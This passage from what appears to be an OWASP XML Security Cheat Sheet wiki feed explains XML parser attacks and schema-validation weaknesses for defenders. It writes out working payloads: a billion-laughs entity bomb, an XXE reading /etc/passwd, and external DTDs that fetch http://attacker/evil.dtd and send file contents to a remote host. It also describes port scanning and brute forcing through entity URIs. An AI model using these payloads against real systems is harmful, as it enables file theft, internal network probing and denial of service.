The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as its 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
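&lt;br /&gt;
The size of the expansion can be computed without performing it. The following Python sketch mirrors the structure of the DTD above (nine levels, ten references per level); the function name &amp;lt;tt&amp;gt;expanded_copies&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
BASE_TEXT = "LOL"          # replacement text of the innermost entity
REFERENCES_PER_LEVEL = 10  # each level references the previous one ten times
LEVELS = 9                 # LOL1 through LOL9


def expanded_copies(levels: int, fan_out: int) -> int:
    """Number of copies of the base text produced by the outermost entity."""
    copies = 1
    for _ in range(levels):
        copies *= fan_out
    return copies


copies = expanded_copies(LEVELS, REFERENCES_PER_LEVEL)
print(copies)                   # 1000000000
print(copies * len(BASE_TEXT))  # 3000000000
```

Each additional level multiplies the result by ten, which is why a DTD of a few hundred characters is enough to exhaust memory.&lt;br /&gt;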
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
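&lt;br /&gt;
As a rough illustration of why this document is expensive to parse, the following Python sketch counts the expansions. It relies only on what the lines above show, namely that each of &amp;lt;tt&amp;gt;LOL2&amp;lt;/tt&amp;gt; through &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; references the previous entity ten times. The function name and the assumed length of &amp;lt;tt&amp;gt;LOL1&amp;lt;/tt&amp;gt; are hypothetical and chosen for the example:&lt;br /&gt;
&lt;br /&gt;
```python
def expansion_count(levels, references_per_level=10):
    """Number of copies of the innermost entity produced by nested references."""
    return references_per_level ** levels


# LOL2 through LOL9 are eight levels stacked on top of LOL1.
copies_of_lol1 = expansion_count(levels=8)
print(copies_of_lol1)

# Hypothetical: if LOL1 expanded to 30 characters, the attribute value would
# hold this many characters once every reference is resolved.
assumed_lol1_length = 30
print(copies_of_lol1 * assumed_lol1_length)
```
&lt;br /&gt;
A document of a few kilobytes can therefore ask the parser to materialize a value that is many orders of magnitude larger.&lt;br /&gt;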
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and the reference to it is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve resources such as a local file or a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what’s going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
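&lt;br /&gt;
The averaging step described above could be sketched in Python as follows. This is only an illustration under stated assumptions: &amp;lt;tt&amp;gt;probe&amp;lt;/tt&amp;gt; is a hypothetical callable that submits one document referencing a given port, and the midpoint rule used to separate the two groups is an arbitrary choice. Which group corresponds to open ports depends on the implementation being tested:&lt;br /&gt;
&lt;br /&gt;
```python
import statistics
import time


def average_latency(probe, attempts=5):
    """Call probe() several times and return the mean elapsed time in seconds."""
    samples = []
    for _ in range(attempts):
        start = time.perf_counter()
        probe()
        samples.append(time.perf_counter() - start)
    return statistics.mean(samples)


def split_by_latency(averages):
    """Group ports into (faster, slower) around the midpoint of the observed means."""
    midpoint = (min(averages.values()) + max(averages.values())) / 2
    faster = sorted(port for port, mean in averages.items() if midpoint > mean)
    slower = sorted(port for port, mean in averages.items() if mean >= midpoint)
    return faster, slower


# Hypothetical averages, in seconds, keyed by port number.
observed = {22: 0.010, 80: 0.012, 8080: 0.250}
print(split_by_latency(observed))
```
&lt;br /&gt;
Taking more attempts per port reduces the effect of network jitter, which is why this approach becomes harder on higher latency networks.&lt;br /&gt;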
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the userinfo component of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
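&lt;br /&gt;
To make the position of the credentials explicit, the following Python sketch builds a URI of that shape and splits it again with the standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module. The helper name &amp;lt;tt&amp;gt;uri_with_credentials&amp;lt;/tt&amp;gt; is an assumption made for the example, and &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; stands in for whatever scheme the target parser supports:&lt;br /&gt;
&lt;br /&gt;
```python
from urllib.parse import quote, urlsplit


def uri_with_credentials(scheme, host, port, username, password):
    """Build scheme://username:password@host:port/ with percent-encoded credentials."""
    userinfo = f"{quote(username, safe='')}:{quote(password, safe='')}"
    return f"{scheme}://{userinfo}@{host}:{port}/"


uri = uri_with_credentials("foo", "example.com", 8080, "username", "password")
parts = urlsplit(uri)
print(uri)
print(parts.username, parts.password, parts.hostname, parts.port)
```
&lt;br /&gt;
Percent-encoding the credentials keeps characters such as the at sign or the colon from being mistaken for URI delimiters.&lt;br /&gt;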
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224423</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224423"/>
				<updated>2016-12-21T20:09:44Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software, divided into two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.6.7 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack, since it requires only half the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open a new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the restrictions that other schema languages can apply to XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after these definitions. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to a range of problems. The result could be the disclosure of internal errors, or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially set for the element, which means that the information is probably tested by application code instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
